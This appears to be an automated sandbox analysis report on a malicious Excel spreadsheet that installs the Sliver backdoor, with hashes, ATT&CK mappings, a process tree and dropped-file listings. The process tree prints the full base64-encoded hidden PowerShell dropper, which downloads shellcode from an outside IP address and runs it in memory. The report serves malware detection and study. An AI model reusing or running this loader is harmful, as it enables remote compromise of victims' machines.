sliver | 311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2

General

Target

311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2.xls
Size

46KB
MD5

7fd89567643fb7500b272127984b7e80
SHA1

7b3eb36264ad0907f9a7bb9368ef8be69bb00d98
SHA256

311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2
SHA512

f476903b4259b29ee5f36adc1f425cc105f3080373409a0d19b9558d827dbb9d747023ecd2b1afe8304e3ca043b921143a89bca8a61914e8e26ab6b83edccf4b
SSDEEP

768:04SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:vSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2824	2540	powershell.exe	EXCEL.EXE

Sliver RAT v2 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2824-45-0x0000000006E30000-0x00000000078AE000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 2824 powershell.exe
6 2824 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2824 powershell.exe

flow	pid	process
4	2824	powershell.exe
6	2824	powershell.exe

pid	process
2824	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exeEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2540 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2824 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2824 powershell.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid process

2540 EXCEL.EXE
2540 EXCEL.EXE
2540 EXCEL.EXE
2540 EXCEL.EXE
2540 EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2540	EXCEL.EXE

pid	process
2824	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2824	powershell.exe

pid	process
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	process	target process
PID 2540 wrote to memory of 2824	2540	EXCEL.EXE	powershell.exe
PID 2540 wrote to memory of 2824	2540	EXCEL.EXE	powershell.exe
PID 2540 wrote to memory of 2824	2540	EXCEL.EXE	powershell.exe
PID 2540 wrote to memory of 2824	2540	EXCEL.EXE	powershell.exe
PID 2824 wrote to memory of 2860	2824	powershell.exe	csc.exe
PID 2824 wrote to memory of 2860	2824	powershell.exe	csc.exe
PID 2824 wrote to memory of 2860	2824	powershell.exe	csc.exe
PID 2824 wrote to memory of 2860	2824	powershell.exe	csc.exe
PID 2860 wrote to memory of 2912	2860	csc.exe	cvtres.exe
PID 2860 wrote to memory of 2912	2860	csc.exe	cvtres.exe
PID 2860 wrote to memory of 2912	2860	csc.exe	cvtres.exe
PID 2860 wrote to memory of 2912	2860	csc.exe	cvtres.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\311b845f45e0a066fbebcc3b75fe94cdcd2c4578634345f254b93f9c3dfc48b2.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uedqxvdw.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE5EC.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabF23D.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE5ED.tmp

Filesize
1KB

MD5
5fa2913716f3dc3a791df42ab3a294bb

SHA1
992be0eebbc99859f70ec4b047314daf3b019c2c

SHA256
65f4c908654a303cf468bd8731b559c6222631e1e6050a94960977a65de65615

SHA512
90f877a9271512c59907188b23f486d48f932a476c96ed13403216a6b3c5be9c4873462e065df8eaa4844b774a954007ad03dc26a7bcf012c5090a14e2d2b936

Download Submit
C:\Users\Admin\AppData\Local\Temp\uedqxvdw.dll

Filesize
3KB

MD5
63709cb857eb16035d957b7d3c976a67

SHA1
ac166a838fed9625d64766bc3af24df90c708112

SHA256
98e422af3c5e4b386d9ff6b887b9029d0bad3f4d2199d81393eaabff70473637

SHA512
1ae5f5677e463428a421b7d107948bcfb54f60fb55eff65adea18da627c94b72154eebe5b59b337a3d12c3a73a344f28c20df5206bdeb9532ca7511231567045

Download Submit
C:\Users\Admin\AppData\Local\Temp\uedqxvdw.pdb

Filesize
7KB

MD5
01d92efc7c080c86ee36481b59212f96

SHA1
a2dc5396ad075f3e4979c490dc0bd184aef538c5

SHA256
5d1192c2c79567fc98b8fb703f6a8d76233d62d1e6610f130e663d8476607869

SHA512
d7f348cd23f3c92821a8283beb7397cc8ec830cd1d94d36bc50ce10cc650a3e86a7edd230e8ad68fa2b8aae501682a8d03545796689c573aca9157d6a6a5f27f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE5EC.tmp

Filesize
652B

MD5
ed3b73cbae3d4352e75c274b705d1a68

SHA1
e104181f44d4bfc026f7bbcc271f7ea06e7a4230

SHA256
629d90be1311a99b5ed4e66deafb02e8f26f9883a8570683cfa6331876ffce4f

SHA512
438ef54e2f4b7ed2f20149198b8b262943f3c9382250c31fdad4a7f041f9dc72bba5b540e0765e29d0a6c418ea084e725627b1509265ac65f981e9e569d38fce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uedqxvdw.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uedqxvdw.cmdline

Filesize
309B

MD5
872a1a703e5f580cfdd643e32469a80e

SHA1
2c04161abe818b09220e693e7560c6cd5c2e04b4

SHA256
1fc89c79fa3feab9d7f96407e3aaedcecedb000bd1f0a601d21c858ebace958f

SHA512
0b603198f416ae3b7565acc9e20ebc3111a1b5b1aaa58854482adb8ce44ec53bbaea494ac43e54792cf5075644917a93e9299498904f563672d5c0c93ca49069

Download Submit
memory/2540-5-0x0000000000450000-0x0000000000550000-memory.dmp

Filesize
1024KB

Download
memory/2540-1-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

Filesize
44KB

Download
memory/2540-6-0x0000000000450000-0x0000000000550000-memory.dmp

Filesize
1024KB

Download
memory/2540-7-0x0000000000450000-0x0000000000550000-memory.dmp

Filesize
1024KB

Download
memory/2540-9-0x0000000000450000-0x0000000000550000-memory.dmp

Filesize
1024KB

Download
memory/2540-3-0x0000000000450000-0x0000000000550000-memory.dmp

Filesize
1024KB

Download
memory/2540-2-0x0000000000450000-0x0000000000550000-memory.dmp

Filesize
1024KB

Download
memory/2540-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2540-43-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

Filesize
44KB

Download
memory/2540-44-0x0000000000450000-0x0000000000550000-memory.dmp

Filesize
1024KB

Download
memory/2824-45-0x0000000006E30000-0x00000000078AE000-memory.dmp

Filesize
10.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads